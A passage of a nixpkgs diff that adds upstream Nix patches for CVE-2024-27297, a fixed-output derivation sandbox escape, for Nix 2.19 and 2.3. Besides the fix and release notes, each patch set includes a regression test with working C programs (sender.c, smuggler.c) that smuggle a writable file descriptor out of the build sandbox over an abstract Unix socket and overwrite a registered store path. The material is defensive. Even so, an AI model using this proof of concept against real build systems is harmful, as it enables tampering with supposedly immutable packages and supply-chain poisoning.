a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc +index 64b55ca6a..f1e22f829 100644 +--- a/src/libstore/build/local-derivation-goal.cc ++++ b/src/libstore/build/local-derivation-goal.cc +@@ -2558,6 +2558,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() + [&](const DerivationOutput::CAFixed & dof) { + auto & wanted = dof.ca.hash; + ++ // Replace the output by a fresh copy of itself to make sure ++ // that there's no stale file descriptor pointing to it ++ Path tmpOutput = actualPath + ".tmp"; ++ copyFile(actualPath, tmpOutput, true); ++ renameFile(tmpOutput, actualPath); ++ + auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating { + .method = dof.ca.method, + .hashType = wanted.type, +diff --git a/src/libutil/filesystem.cc b/src/libutil/filesystem.cc +index 11cc0c0e7..2a7787c0e 100644 +--- a/src/libutil/filesystem.cc ++++ b/src/libutil/filesystem.cc +@@ -133,6 +133,12 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete) + } + } + ++ ++void copyFile(const Path & oldPath, const Path & newPath, bool andDelete) ++{ ++ return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete); ++} ++ + void renameFile(const Path & oldName, const Path & newName) + { + fs::rename(oldName, newName); +diff --git a/src/libutil/util.hh b/src/libutil/util.hh +index b302d6f45..59d42e0a5 100644 +--- a/src/libutil/util.hh ++++ b/src/libutil/util.hh +@@ -274,6 +274,13 @@ void renameFile(const Path & src, const Path & dst); + */ + void moveFile(const Path & src, const Path & dst); + ++/** ++ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is ++ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but ++ * with the guaranty that the destination will be “fresh”, with no stale inode ++ * or file descriptor pointing to it). ++ */ ++void copyFile(const Path & oldPath, const Path & newPath, bool andDelete); + + /** + * Wrappers arount read()/write() that read/write exactly the +-- +2.42.0 + + +From 9e7065bef5469b3024cde2bbc7745530a64fde5b Mon Sep 17 00:00:00 2001 +From: Tom Bereknyei <tomberek@gmail.com> +Date: Fri, 1 Mar 2024 04:01:23 -0500 +Subject: [PATCH 3/3] Add release notes + +Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io> +--- + doc/manual/src/release-notes/rl-next.md | 8 ++++++++ + 1 file changed, 8 insertions(+) + +diff --git a/doc/manual/src/release-notes/rl-next.md b/doc/manual/src/release-notes/rl-next.md +index c869b5e2f..f77513385 100644 +--- a/doc/manual/src/release-notes/rl-next.md ++++ b/doc/manual/src/release-notes/rl-next.md +@@ -1 +1,9 @@ + # Release X.Y (202?-??-??) ++ ++- Fix a FOD sandbox escape: ++ Cooperating Nix derivations could send file descriptors to files in the Nix ++ store to each other via Unix domain sockets in the abstract namespace. This ++ allowed one derivation to modify the output of the other derivation, after Nix ++ has registered the path as "valid" and immutable in the Nix database. ++ In particular, this allowed the output of fixed-output derivations to be ++ modified from their expected content. This isn't the case any more. +-- +2.42.0 + diff --git a/nixpkgs/pkgs/tools/package-management/nix/patches/2_19/CVE-2024-27297.patch b/nixpkgs/pkgs/tools/package-management/nix/patches/2_19/CVE-2024-27297.patch new file mode 100644 index 000000000000..e75b7577af1e --- /dev/null +++ b/nixpkgs/pkgs/tools/package-management/nix/patches/2_19/CVE-2024-27297.patch @@ -0,0 +1,407 @@ +From ca05f6d2038a749f63205fccc4a4daa914a6b95b Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= + <theophane.hufschmitt@tweag.io> +Date: Mon, 12 Feb 2024 21:28:20 +0100 +Subject: [PATCH 1/4] Add a NixOS test for the sandbox escape + +Test that we can't leverage abstract unix domain sockets to leak file +descriptors out of the sandbox and modify the path after it has been +registered. +--- + tests/nixos/ca-fd-leak/default.nix | 90 ++++++++++++++++++++++++++++++ + tests/nixos/ca-fd-leak/sender.c | 65 +++++++++++++++++++++ + tests/nixos/ca-fd-leak/smuggler.c | 66 ++++++++++++++++++++++ + tests/nixos/default.nix | 2 + + 4 files changed, 223 insertions(+) + create mode 100644 tests/nixos/ca-fd-leak/default.nix + create mode 100644 tests/nixos/ca-fd-leak/sender.c + create mode 100644 tests/nixos/ca-fd-leak/smuggler.c + +diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix +new file mode 100644 +index 000000000..40e57ea02 +--- /dev/null ++++ b/tests/nixos/ca-fd-leak/default.nix +@@ -0,0 +1,90 @@ ++# Nix is a sandboxed build system. But Not everything can be handled inside its ++# sandbox: Network access is normally blocked off, but to download sources, a ++# trapdoor has to exist. Nix handles this by having "Fixed-output derivations". ++# The detail here is not important, but in our case it means that the hash of ++# the output has to be known beforehand. And if you know that, you get a few ++# rights: you no longer run inside a special network namespace! ++# ++# Now, Linux has a special feature, that not many other unices do: Abstract ++# unix domain sockets! Not only that, but those are namespaced using the ++# network namespace! That means that we have a way to create sockets that are ++# available in every single fixed-output derivation, and also all processes ++# running on the host machine! Now, this wouldn't be that much of an issue, as, ++# well, the whole idea is that the output is pure, and all processes in the ++# sandbox are killed before finalizing the output. What if we didn't need those ++# processes at all? Unix domain sockets have a semi-known trick: you can pass ++# file descriptors around! ++# This makes it possible to exfiltrate a file-descriptor with write access to ++# $out outside of the sandbox. And that file-descriptor can be used to modify ++# the contents of the store path after it has been registered. ++ ++{ config, ... }: ++ ++let ++ pkgs = config.nodes.machine.nixpkgs.pkgs; ++ ++ # Simple C program that sends a a file descriptor to `$out` to a Unix ++ # domain socket. ++ # Compiled statically so that we can easily send it to the VM and use it ++ # inside the build sandbox. ++ sender = pkgs.runCommandWith { ++ name = "sender"; ++ stdenv = pkgs.pkgsStatic.stdenv; ++ } '' ++ $CC -static -o $out ${./sender.c} ++ ''; ++ ++ # Okay, so we have a file descriptor shipped out of the FOD now. But the ++ # Nix store is read-only, right? .. Well, yeah. But this file descriptor ++ # lives in a mount namespace where it is not! So even when this file exists ++ # in the actual Nix store, we're capable of just modifying its contents... ++ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c); ++ ++ # The abstract socket path used to exfiltrate the file descriptor ++ socketName = "FODSandboxExfiltrationSocket"; ++in ++{ ++ name = "ca-fd-leak"; ++ ++ nodes.machine = ++ { config, lib, pkgs, ... }: ++ { virtualisation.writableStore = true; ++ nix.settings.substituters = lib.mkForce [ ]; ++ virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ]; ++ }; ++ ++ testScript = { nodes }: '' ++ start_all() ++ ++ machine.succeed("echo hello") ++ # Start the smuggler server ++ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &") ++ ++ # Build the smuggled derivation. ++ # This will connect to the smuggler server and send it the file descriptor ++ machine.succeed(r""" ++ nix-build -E ' ++ builtins.derivation { ++ name = "smuggled"; ++ system = builtins.currentSystem; ++ # look ma, no tricks! ++ outputHashMode = "flat"; ++ outputHashAlgo = "sha256"; ++ outputHash = builtins.hashString "sha256" "hello, world\n"; ++ builder = "${pkgs.busybox-sandbox-shell}/bin/sh"; ++ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ]; ++ }' ++ """.strip()) ++ ++ ++ # Tell the smuggler server that we're done ++ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") ++ ++ # Check that the file was modified ++ machine.succeed(r""" ++ cat ./result ++ test "$(cat ./result)" = "hello, world" ++ """.strip()) ++ ''; ++ ++} +diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c +new file mode 100644 +index 000000000..75e54fc8f +--- /dev/null ++++ b/tests/nixos/ca-fd-leak/sender.c +@@ -0,0 +1,65 @@ ++#include <sys/socket.h> ++#include <sys/un.h> ++#include <stdlib.h> ++#include <stddef.h> ++#include <stdio.h> ++#include <unistd.h> ++#include <fcntl.h> ++#include <errno.h> ++#include <string.h> ++#include <assert.h> ++ ++int main(int argc, char **argv) { ++ ++ assert(argc == 2); ++ ++ int sock = socket(AF_UNIX, SOCK_STREAM, 0); ++ ++ // Set up a abstract domain socket path to connect to. ++ struct sockaddr_un data; ++ data.sun_family = AF_UNIX; ++ data.sun_path[0] = 0; ++ strcpy(data.sun_path + 1, argv[1]); ++ ++ // Now try to connect, To ensure we work no matter what order we are ++ // executed in, just busyloop here. ++ int res = -1; ++ while (res < 0) { ++ res = connect(sock, (const struct sockaddr *)&data, ++ offsetof(struct sockaddr_un, sun_path) ++ + strlen(argv[1]) ++ + 1); ++ if (res < 0 && errno != ECONNREFUSED) perror("connect"); ++ if (errno != ECONNREFUSED) break; ++ } ++ ++ // Write our message header. ++ struct msghdr msg = {0}; ++ msg.msg_control = malloc(128); ++ msg.msg_controllen = 128; ++ ++ // Write an SCM_RIGHTS message containing the output path. ++ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); ++ hdr->cmsg_len = CMSG_LEN(sizeof(int)); ++ hdr->cmsg_level = SOL_SOCKET; ++ hdr->cmsg_type = SCM_RIGHTS; ++ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640); ++ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); ++ ++ msg.msg_controllen = CMSG_SPACE(sizeof(int)); ++ ++ // Write a single null byte too. ++ msg.msg_iov = malloc(sizeof(struct iovec)); ++ msg.msg_iov[0].iov_base = ""; ++ msg.msg_iov[0].iov_len = 1; ++ msg.msg_iovlen = 1; ++ ++ // Send it to the othher side of this connection. ++ res = sendmsg(sock, &msg, 0); ++ if (res < 0) perror("sendmsg"); ++ int buf; ++ ++ // Wait for the server to close the socket, implying that it has ++ // received the commmand. ++ recv(sock, (void *)&buf, sizeof(int), 0); ++} +diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c +new file mode 100644 +index 000000000..82acf37e6 +--- /dev/null ++++ b/tests/nixos/ca-fd-leak/smuggler.c +@@ -0,0 +1,66 @@ ++#include <sys/socket.h> ++#include <sys/un.h> ++#include <stdlib.h> ++#include <stddef.h> ++#include <stdio.h> ++#include <unistd.h> ++#include <assert.h> ++ ++int main(int argc, char **argv) { ++ ++ assert(argc == 2); ++ ++ int sock = socket(AF_UNIX, SOCK_STREAM, 0); ++ ++ // Bind to the socket. ++ struct sockaddr_un data; ++ data.sun_family = AF_UNIX; ++ data.sun_path[0] = 0; ++ strcpy(data.sun_path + 1, argv[1]); ++ int res = bind(sock, (const struct sockaddr *)&data, ++ offsetof(struct sockaddr_un, sun_path) ++ + strlen(argv[1]) ++ + 1); ++ if (res < 0) perror("bind"); ++ ++ res = listen(sock, 1); ++ if (res < 0) perror("listen"); ++ ++ int smuggling_fd = -1; ++ ++ // Accept the connection a first time to receive the file descriptor. ++ fprintf(stderr, "%s\n", "Waiting for the first connection"); ++ int a = accept(sock, 0, 0); ++ if (a < 0) perror("accept"); ++ ++ struct msghdr msg = {0}; ++ msg.msg_control = malloc(128); ++ msg.msg_controllen = 128; ++ ++ // Receive the file descriptor as sent by the smuggler. ++ recvmsg(a, &msg, 0); ++ ++ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); ++ while (hdr) { ++ if (hdr->cmsg_level == SOL_SOCKET ++ && hdr->cmsg_type == SCM_RIGHTS) { ++ ++ // Grab the copy of the file descriptor. ++ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int)); ++ } ++ ++ hdr = CMSG_NXTHDR(&msg, hdr); ++ } ++ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection"); ++ close(a); ++ ++ // Wait for a second connection, which will tell us that the build is ++ // done ++ a = accept(sock, 0, 0); ++ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file"); ++ // Write a new content to the file ++ if (ftruncate(smuggling_fd, 0)) perror("ftruncate"); ++ char * new_content = "Pwned\n"; ++ int written_bytes = write(smuggling_fd, new_content, strlen(new_content)); ++ if (written_bytes != strlen(new_content)) perror("write"); ++} +diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix +index 4459aa664..4c1cf785c 100644 +--- a/tests/nixos/default.nix ++++ b/tests/nixos/default.nix +@@ -40,4 +40,6 @@ in + setuid = lib.genAttrs + ["i686-linux" "x86_64-linux"] + (system: runNixOSTestFor system ./setuid.nix); ++ ++ ca-fd-leak = runNixOSTestFor "x86_64-linux" ./ca-fd-leak; + } +-- +2.42.0 + + +From 558dab42315f493aa4e8480a57c2d3b0834392ec Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= + <theophane.hufschmitt@tweag.io> +Date: Tue, 13 Feb 2024 08:28:02 +0100 +Subject: [PATCH 2/4] Copy the output of fixed-output derivations before + registering them + +It is possible to exfiltrate a file descriptor out of the build sandbox +of FODs, and use it to modify the store path after it has been +registered. +To avoid that issue, don't register the output of the build, but a copy +of it (that will be free of any leaked file descriptor). +--- + src/libstore/build/local-derivation-goal.cc | 6 ++++++ + src/libutil/file-system.cc | 5 +++++ + src/libutil/file-system.hh | 7 +++++++ + 3 files changed, 18 insertions(+) + +diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc +index a9f930773..d83c47d00 100644 +--- a/src/libstore/build/local-derivation-goal.cc ++++ b/src/libstore/build/local-derivation-goal.cc +@@ -2543,6 +2543,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() + [&](const DerivationOutput::CAFixed & dof) { + auto & wanted = dof.ca.hash; + ++ // Replace the output by a fresh copy of itself to make sure ++ // that there's no stale file descriptor pointing to it ++ Path tmpOutput = actualPath + ".tmp"; ++ copyFile(actualPath, tmpOutput, true); ++ renameFile(tmpOutput, actualPath); ++ + auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating { + .method = dof.ca.method, + .hashType = wanted.type, +diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc +index c96effff9..777f83c30 100644 +--- a/src/libutil/file-system.cc ++++ b/src/libutil/file-system.cc +@@ -616,6 +616,11 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete) + } + } + ++void copyFile(const Path & oldPath, const Path & newPath, bool andDelete) ++{ ++ return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete); ++} ++ + void renameFile(const Path & oldName, const Path & newName) + { + fs::rename(oldName, newName); +diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh +index 4637507b3..71db7d8bc 100644 +--- a/src/libutil/file-system.hh ++++ b/src/libutil/file-system.hh +@@ -186,6 +186,13 @@ void renameFile(const Path & src, const Path & dst); + */ + void moveFile(const Path & src, const Path & dst); + ++/** ++ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is ++ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but ++ * with the guaranty that the destination will be “fresh”, with no stale inode ++ * or file descriptor pointing to it). ++ */ ++void copyFile(const Path & oldPath, const Path & newPath, bool andDelete); + + /** + * Automatic cleanup of resources. +-- +2.42.0 + + +From 6adce5c3baddf20a5865a646a6d5117e83693497 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= + <7226587+thufschmitt@users.noreply.github.com> +Date: Wed, 21 Feb 2024 17:32:36 +0100 +Subject: [PATCH 3/4] Fix a typo in a test comment + +Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io> +--- + tests/nixos/ca-fd-leak/default.nix | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix +index 40e57ea02..a6ae72adc 100644 +--- a/tests/nixos/ca-fd-leak/default.nix ++++ b/tests/nixos/ca-fd-leak/default.nix +@@ -80,7 +80,7 @@ in + # Tell the smuggler server that we're done + machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") + +- # Check that the file was modified ++ # Check that the file was not modified + machine.succeed(r""" + cat ./result + test "$(cat ./result)" = "hello, world" +-- +2.42.0 + + +From 7a803d9d5460cc990f20eff7d4d5a3623298c15b Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= + <theophane.hufschmitt@tweag.io> +Date: Fri, 1 Mar 2024 09:31:05 +0100 +Subject: [PATCH 4/4] Add release notes + +--- + doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++ + 1 file changed, 14 insertions(+) + create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md + +diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md +new file mode 100644 +index 000000000..ed451711e +--- /dev/null ++++ b/doc/manual/rl-next/fod-sandbox-escape.md +@@ -0,0 +1,14 @@ ++--- ++synopsis: Fix a FOD sandbox escape ++issues: ++prs: ++--- ++ ++Cooperating Nix derivations could send file descriptors to files in the Nix ++store to each other via Unix domain sockets in the abstract namespace. This ++allowed one derivation to modify the output of the other derivation, after Nix ++has registered the path as "valid" and immutable in the Nix database. ++In particular, this allowed the output of fixed-output derivations to be ++modified from their expected content. ++ ++This isn't the case any more. +-- +2.42.0 diff --git a/nixpkgs/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch b/nixpkgs/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch new file mode 100644 index 000000000000..b8201cb99ef5 --- /dev/null +++ b/nixpkgs/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch @@ -0,0 +1,375 @@ +From 9c0be4c156e74a3e7e0d33b04d870642350e72d4 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= + <theophane.hufschmitt@tweag.io> +Date: Mon, 12 Feb 2024 21:28:20 +0100 +Subject: [PATCH 1/4] Add a NixOS test for the sandbox escape + +Test that we can't leverage abstract unix domain sockets to leak file +descriptors out of the sandbox and modify the path after it has been +registered. +--- + release.nix | 5 ++ + tests/nixos/ca-fd-leak/default.nix | 93 ++++++++++++++++++++++++++++++ + tests/nixos/ca-fd-leak/sender.c | 65 +++++++++++++++++++++ + tests/nixos/ca-fd-leak/smuggler.c | 66 +++++++++++++++++++++ + 4 files changed, 229 insertions(+) + create mode 100644 tests/nixos/ca-fd-leak/default.nix + create mode 100644 tests/nixos/ca-fd-leak/sender.c + create mode 100644 tests/nixos/ca-fd-leak/smuggler.c + +diff --git a/release.nix b/release.nix +index f468946c5..2e71f3796 100644 +--- a/release.nix ++++ b/release.nix +@@ -235,6 +235,11 @@ let + nix = build.x86_64-linux; system = "x86_64-linux"; + }); + ++ tests.ca-fd-leak = (import ./tests/nixos/ca-fd-leak rec { ++ inherit nixpkgs; ++ nix = build.x86_64-linux; system = "x86_64-linux"; ++ }); ++ + tests.setuid = pkgs.lib.genAttrs + ["i686-linux" "x86_64-linux"] + (system: +diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix +new file mode 100644 +index 000000000..c252caa4d +--- /dev/null ++++ b/tests/nixos/ca-fd-leak/default.nix +@@ -0,0 +1,93 @@ ++# Nix is a sandboxed build system. But Not everything can be handled inside its ++# sandbox: Network access is normally blocked off, but to download sources, a ++# trapdoor has to exist. Nix handles this by having "Fixed-output derivations". ++# The detail here is not important, but in our case it means that the hash of ++# the output has to be known beforehand. And if you know that, you get a few ++# rights: you no longer run inside a special network namespace! ++# ++# Now, Linux has a special feature, that not many other unices do: Abstract ++# unix domain sockets! Not only that, but those are namespaced using the ++# network namespace! That means that we have a way to create sockets that are ++# available in every single fixed-output derivation, and also all processes ++# running on the host machine! Now, this wouldn't be that much of an issue, as, ++# well, the whole idea is that the output is pure, and all processes in the ++# sandbox are killed before finalizing the output. What if we didn't need those ++# processes at all? Unix domain sockets have a semi-known trick: you can pass ++# file descriptors around! ++# This makes it possible to exfiltrate a file-descriptor with write access to ++# $out outside of the sandbox. And that file-descriptor can be used to modify ++# the contents of the store path after it has been registered. ++ ++{ nixpkgs, system, nix }: ++ ++with import (nixpkgs + "/nixos/lib/testing-python.nix") { ++ inherit system; ++}; ++ ++let ++ # Simple C program that sends a a file descriptor to `$out` to a Unix ++ # domain socket. ++ # Compiled statically so that we can easily send it to the VM and use it ++ # inside the build sandbox. ++ sender = pkgs.runCommandWith { ++ name = "sender"; ++ stdenv = pkgs.pkgsStatic.stdenv; ++ } '' ++ $CC -static -o $out ${./sender.c} ++ ''; ++ ++ # Okay, so we have a file descriptor shipped out of the FOD now. But the ++ # Nix store is read-only, right? .. Well, yeah. But this file descriptor ++ # lives in a mount namespace where it is not! So even when this file exists ++ # in the actual Nix store, we're capable of just modifying its contents... ++ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c); ++ ++ # The abstract socket path used to exfiltrate the file descriptor ++ socketName = "FODSandboxExfiltrationSocket"; ++in ++makeTest { ++ name = "ca-fd-leak"; ++ ++ nodes.machine = ++ { config, lib, pkgs, ... }: ++ { virtualisation.writableStore = true; ++ virtualisation.pathsInNixDB = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ]; ++ nix.binaryCaches = [ ]; ++ nix.package = nix; ++ }; ++ ++ testScript = { nodes }: '' ++ start_all() ++ ++ machine.succeed("echo hello") ++ # Start the smuggler server ++ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &") ++ ++ # Build the smuggled derivation. ++ # This will connect to the smuggler server and send it the file descriptor ++ machine.succeed(r""" ++ nix-build -E ' ++ builtins.derivation { ++ name = "smuggled"; ++ system = builtins.currentSystem; ++ # look ma, no tricks! ++ outputHashMode = "flat"; ++ outputHashAlgo = "sha256"; ++ outputHash = builtins.hashString "sha256" "hello, world\n"; ++ builder = "${pkgs.busybox-sandbox-shell}/bin/sh"; ++ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ]; ++ }' ++ """.strip()) ++ ++ ++ # Tell the smuggler server that we're done ++ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") ++ ++ # Check that the file was modified ++ machine.succeed(r""" ++ cat ./result ++ test "$(cat ./result)" = "hello, world" ++ """.strip()) ++ ''; ++ ++} +diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c +new file mode 100644 +index 000000000..75e54fc8f +--- /dev/null ++++ b/tests/nixos/ca-fd-leak/sender.c +@@ -0,0 +1,65 @@ ++#include <sys/socket.h> ++#include <sys/un.h> ++#include <stdlib.h> ++#include <stddef.h> ++#include <stdio.h> ++#include <unistd.h> ++#include <fcntl.h> ++#include <errno.h> ++#include <string.h> ++#include <assert.h> ++ ++int main(int argc, char **argv) { ++ ++ assert(argc == 2); ++ ++ int sock = socket(AF_UNIX, SOCK_STREAM, 0); ++ ++ // Set up a abstract domain socket path to connect to. ++ struct sockaddr_un data; ++ data.sun_family = AF_UNIX; ++ data.sun_path[0] = 0; ++ strcpy(data.sun_path + 1, argv[1]); ++ ++ // Now try to connect, To ensure we work no matter what order we are ++ // executed in, just busyloop here. ++ int res = -1; ++ while (res < 0) { ++ res = connect(sock, (const struct sockaddr *)&data, ++ offsetof(struct sockaddr_un, sun_path) ++ + strlen(argv[1]) ++ + 1); ++ if (res < 0 && errno != ECONNREFUSED) perror("connect"); ++ if (errno != ECONNREFUSED) break; ++ } ++ ++ // Write our message header. ++ struct msghdr msg = {0}; ++ msg.msg_control = malloc(128); ++ msg.msg_controllen = 128; ++ ++ // Write an SCM_RIGHTS message containing the output path. ++ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); ++ hdr->cmsg_len = CMSG_LEN(sizeof(int)); ++ hdr->cmsg_level = SOL_SOCKET; ++ hdr->cmsg_type = SCM_RIGHTS; ++ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640); ++ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); ++ ++ msg.msg_controllen = CMSG_SPACE(sizeof(int)); ++ ++ // Write a single null byte too. ++ msg.msg_iov = malloc(sizeof(struct iovec)); ++ msg.msg_iov[0].iov_base = ""; ++ msg.msg_iov[0].iov_len = 1; ++ msg.msg_iovlen = 1; ++ ++ // Send it to the othher side of this connection. ++ res = sendmsg(sock, &msg, 0); ++ if (res < 0) perror("sendmsg"); ++ int buf; ++ ++ // Wait for the server to close the socket, implying that it has ++ // received the commmand. ++ recv(sock, (void *)&buf, sizeof(int), 0); ++} +diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c +new file mode 100644 +index 000000000..82acf37e6 +--- /dev/null ++++ b/tests/nixos/ca-fd-leak/smuggler.c +@@ -0,0 +1,66 @@ ++#include <sys/socket.h> ++#include <sys/un.h> ++#include <stdlib.h> ++#include <stddef.h> ++#include <stdio.h> ++#include <unistd.h> ++#include <assert.h> ++ ++int main(int argc, char **argv) { ++ ++ assert(argc == 2); ++ ++ int sock = socket(AF_UNIX, SOCK_STREAM, 0); ++ ++ // Bind to the socket. ++ struct sockaddr_un data; ++ data.sun_family = AF_UNIX; ++ data.sun_path[0] = 0; ++ strcpy(data.sun_path + 1, argv[1]); ++ int res = bind(sock, (const struct sockaddr *)&data, ++ offsetof(struct sockaddr_un, sun_path) ++ + strlen(argv[1]) ++ + 1); ++ if (res < 0) perror("bind"); ++ ++ res = listen(sock, 1); ++ if (res < 0) perror("listen"); ++ ++ int smuggling_fd = -1; ++ ++ // Accept the connection a first time to receive the file descriptor. ++ fprintf(stderr, "%s\n", "Waiting for the first connection"); ++ int a = accept(sock, 0, 0); ++ if (a < 0) perror("accept"); ++ ++ struct msghdr msg = {0}; ++ msg.msg_control = malloc(128); ++ msg.msg_controllen = 128; ++ ++ // Receive the file descriptor as sent by the smuggler. ++ recvmsg(a, &msg, 0); ++ ++ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); ++ while (hdr) { ++ if (hdr->cmsg_level == SOL_SOCKET ++ && hdr->cmsg_type == SCM_RIGHTS) { ++ ++ // Grab the copy of the file descriptor. ++ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int)); ++ } ++ ++ hdr = CMSG_NXTHDR(&msg, hdr); ++ } ++ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection"); ++ close(a); ++ ++ // Wait for a second connection, which will tell us that the build is ++ // done ++ a = accept(sock, 0, 0); ++ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file"); ++ // Write a new content to the file ++ if (ftruncate(smuggling_fd, 0)) perror("ftruncate"); ++ char * new_content = "Pwned\n"; ++ int written_bytes = write(smuggling_fd, new_content, strlen(new_content)); ++ if (written_bytes != strlen(new_content)) perror("write"); ++} + +From 8c27eb6c1bc490c9d2f3c7c1dedb1ca3c8e00759 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= + <theophane.hufschmitt@tweag.io> +Date: Tue, 13 Feb 2024 08:28:02 +0100 +Subject: [PATCH 2/4] Copy the output of fixed-output derivations before + registering them + +It is possible to exfiltrate a file descriptor out of the build sandbox +of FODs, and use it to modify the store path after it has been +registered. +To avoid that issue, don't register the output of the build, but a copy +of it (that will be free of any leaked file descriptor). +--- + src/libstore/build.cc | 11 +++++++++-- + 1 file changed, 9 insertions(+), 2 deletions(-) + +diff --git a/src/libstore/build.cc b/src/libstore/build.cc +index d3a712c1a..3fb827a15 100644 +--- a/src/libstore/build.cc ++++ b/src/libstore/build.cc +@@ -3286,10 +3286,17 @@ void DerivationGoal::registerOutputs() + throw BuildError(format("suspicious ownership or permission on '%1%'; rejecting this build output") % path); + #endif + +- /* Apply hash rewriting if necessary. */ ++ /* Apply hash rewriting if necessary. ++ * ++ * For FODs, we always do the dump-and-restore dance regardless to make ++ * sure that there's no stale file descriptor pointing to the output ++ * of the path. ++ * */ + bool rewritten = false; +- if (!outputRewrites.empty()) { ++ if (fixedOutput || !outputRewrites.empty()) { ++ if (!outputRewrites.empty()) { + printError(format("warning: rewriting hashes in '%1%'; cross fingers") % path); ++ } + + /* Canonicalise first. This ensures that the path we're + rewriting doesn't contain a hard link to /etc/shadow or + +From 2064277b0566c361339d55fbbf46edbc2519f3b3 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= + <7226587+thufschmitt@users.noreply.github.com> +Date: Wed, 21 Feb 2024 17:32:36 +0100 +Subject: [PATCH 3/4] Fix a typo in a test comment + +Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io> +--- + tests/nixos/ca-fd-leak/default.nix | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix +index c252caa4d..2fd5ca2d6 100644 +--- a/tests/nixos/ca-fd-leak/default.nix ++++ b/tests/nixos/ca-fd-leak/default.nix +@@ -83,7 +83,7 @@ makeTest { + # Tell the smuggler server that we're done + machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") + +- # Check that the file was modified ++ # Check that the file was not modified + machine.succeed(r""" + cat ./result + test "$(cat ./result)" = "hello, world" + +From 8604f6d32976fbdf84e46f75cbfa2446209b8a6b Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= + <theophane.hufschmitt@tweag.io> +Date: Fri, 1 Mar 2024 09:31:05 +0100 +Subject: [PATCH 4/4] Add release notes + +--- + doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++ + 1 file changed, 14 insertions(+) + create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md + +diff --git 